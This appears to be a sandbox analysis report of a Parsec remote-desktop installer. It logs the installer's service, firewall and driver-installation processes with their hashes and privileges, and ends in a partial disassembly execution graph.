                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:18
                            Start time:20:58:25
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:20:58:28
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:20
                            Start time:20:58:28
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" stop Parsec
                            Imagebase:0x8b0000
                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:20:58:28
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:20:58:29
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" delete Parsec
                            Imagebase:0x8b0000
                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:20:58:29
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:20:58:29
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:25
                            Start time:20:58:29
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\netsh.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
                            Imagebase:0x1080000
                            File size:82'432 bytes
                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:27
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\netsh.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe
                            Imagebase:0x1080000
                            File size:82'432 bytes
                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:28
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:29
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\netsh.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe
                            Imagebase:0x1080000
                            File size:82'432 bytes
                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:30
                            Start time:20:58:30
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:31
                            Start time:20:58:31
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:32
                            Start time:20:58:31
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
                            Imagebase:0xe90000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:33
                            Start time:20:58:31
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:34
                            Start time:20:58:32
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:35
                            Start time:20:58:32
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own
                            Imagebase:0x8b0000
                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:36
                            Start time:20:58:32
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:37
                            Start time:20:58:33
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\sc.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\sc.exe" start Parsec
                            Imagebase:0x8b0000
                            File size:61'440 bytes
                            MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:20:58:33
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:39
                            Start time:20:58:33
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec\pservice.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Parsec\pservice.exe"
                            Imagebase:0x7ff7cd030000
                            File size:418'696 bytes
                            MD5 hash:46CD3FC327AF9109BD143BA7F16DF397
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:false

                            General

                            Target ID:40
                            Start time:20:58:33
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wscript.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe"
                            Imagebase:0xfa0000
                            File size:147'456 bytes
                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:41
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\netsh.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain
                            Imagebase:0x1080000
                            File size:82'432 bytes
                            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:42
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:43
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:44
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:45
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files\Parsec\vusb\parsec-vud.exe" /S
                            Imagebase:0x400000
                            File size:907'184 bytes
                            MD5 hash:2D009D446A0BA83EC2F12242F7ED126C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:46
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:47
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:48
                            Start time:20:58:34
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA
                            Imagebase:0x7ff72c2f0000
                            File size:596'352 bytes
                            MD5 hash:DDDEE00430F7A3D52580B7C85D63D9DC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:49
                            Start time:20:58:35
                            Start date:13/11/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat""
                            Imagebase:0x7ff7bbb40000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:50
                            Start time:20:58:35
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:51
                            Start time:20:58:35
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000"
                            Imagebase:0x7ff7e5a80000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:52
                            Start time:20:58:36
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf"
                            Imagebase:0x7ff7e5a80000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:53
                            Start time:20:58:36
                            Start date:13/11/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                            Imagebase:0x7ff7e52b0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:54
                            Start time:20:58:36
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:55
                            Start time:20:58:38
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000158"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:56
                            Start time:20:58:40
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf"
                            Imagebase:0x7ff7e5a80000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:57
                            Start time:20:58:40
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:58
                            Start time:20:58:41
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "0000000000000158" "WinSta0\Default"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:59
                            Start time:20:58:42
                            Start date:13/11/2024
                            Path:C:\Windows\System32\runonce.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\runonce.exe" -r
                            Imagebase:0x7ff600600000
                            File size:61'952 bytes
                            MD5 hash:9ADEF025B168447C1E8514D919CB5DC0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:60
                            Start time:20:58:42
                            Start date:13/11/2024
                            Path:C:\Windows\System32\grpconv.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\grpconv.exe" -o
                            Imagebase:0x7ff679d30000
                            File size:52'736 bytes
                            MD5 hash:8531882ACC33CB4BDC11B305A01581CE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:62
                            Start time:20:58:43
                            Start date:13/11/2024
                            Path:C:\Windows\System32\drvinst.exe
                            Wow64 process (32bit):false
                            Commandline:DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "0000000000000190" "WinSta0\Default"
                            Imagebase:0x7ff782fa0000
                            File size:337'920 bytes
                            MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:63
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:64
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:65
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S
                            Imagebase:0x400000
                            File size:517'256 bytes
                            MD5 hash:4B9A3048286692A865187013B70F44E8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:66
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\wevtutil.exe
                            Wow64 process (32bit):true
                            Commandline:wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man"
                            Imagebase:0xdd0000
                            File size:208'384 bytes
                            MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:67
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:68
                            Start time:20:58:45
                            Start date:13/11/2024
                            Path:C:\Windows\System32\wevtutil.exe
                            Wow64 process (32bit):false
                            Commandline:wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64
                            Imagebase:0x7ff7040d0000
                            File size:278'016 bytes
                            MD5 hash:1AAE26BD68B911D0420626A27070EB8D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:69
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat""
                            Imagebase:0x790000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:70
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:71
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:.\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318"
                            Imagebase:0x7ff618140000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Has exited:true

                            General

                            Target ID:72
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:.\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA
                            Imagebase:0x7ff618140000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:73
                            Start time:20:58:46
                            Start date:13/11/2024
                            Path:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            Wow64 process (32bit):false
                            Commandline:.\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"
                            Imagebase:0x7ff618140000
                            File size:588'160 bytes
                            MD5 hash:E9F2BC8C82AC755F47C7F89D1530F1A1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8.2%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.3%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:52
                              execution_graph 32196 f82978 32197 f829d7 32196->32197 32198 f8299b 32196->32198 32198->32197 32200 f7f148 32198->32200 32201 f7f168 32200->32201 32202 f7f30b 32201->32202 32203 f7f2c2 32201->32203 32206 f7f195 32201->32206 32207 f7f28f 32201->32207 32209 f7f24a 32201->32209 32210 f7f2b1 GetLastError 32201->32210 32216 f797b8 ReadFile 32201->32216 32217 f796f8 32201->32217 32204 f7f34f GetLastError 32202->32204 32202->32206 32205 f7f2ce memmove 32203->32205 32203->32206 32204->32206 32205->32206 32206->32198 32207->32202 32213 f796f8 5 API calls 32207->32213 32209->32201 32215 f7f348 32209->32215 32225 fcd880 VirtualAlloc 32209->32225 32210->32206 32214 f7f2ad 32213->32214 32214->32202 32214->32210 32215->32206 32216->32201 32218 f79720 SetFilePointer 32217->32218 32219 f7970d 32217->32219 32220 f79766 32218->32220 32221 f79743 GetLastError 32218->32221 32219->32218 32220->32201 32221->32220 32222 f7974f 32221->32222 32226 f7969c SetFilePointer GetLastError 32222->32226 32224 f7975a SetLastError 32224->32220 32225->32209 32226->32224 32227 f86b58 32228 f86b79 32227->32228 32229 f86b88 32227->32229 32228->32229 32231 fc0284 EnterCriticalSection 32228->32231 32232 fc02a8 32231->32232 32233 fc02b5 LeaveCriticalSection 32231->32233 32235 fcb774 32232->32235 32233->32229 32236 fcb79d 32235->32236 32237 fcb794 GetTickCount 32235->32237 32238 fcb805 32236->32238 32240 fcba72 32236->32240 32241 fcb7cf strcmp 32236->32241 32237->32236 32238->32240 32282 fcb56c 32238->32282 32240->32233 32241->32238 32243 fcb7e4 32241->32243 32243->32238 32246 fcb7ef wcscmp 32243->32246 32244 fcb870 32290 f72ecc 32244->32290 32246->32238 32247 fcb858 strcmp 32247->32240 32247->32244 32248 fcb8a7 32249 fcb8c1 32248->32249 32251 f73cec _CxxThrowException 32248->32251 32252 fcb9db 32249->32252 32257 f73cec _CxxThrowException 32249->32257 32250 fcb87f 32250->32248 32304 f73cec 32250->32304 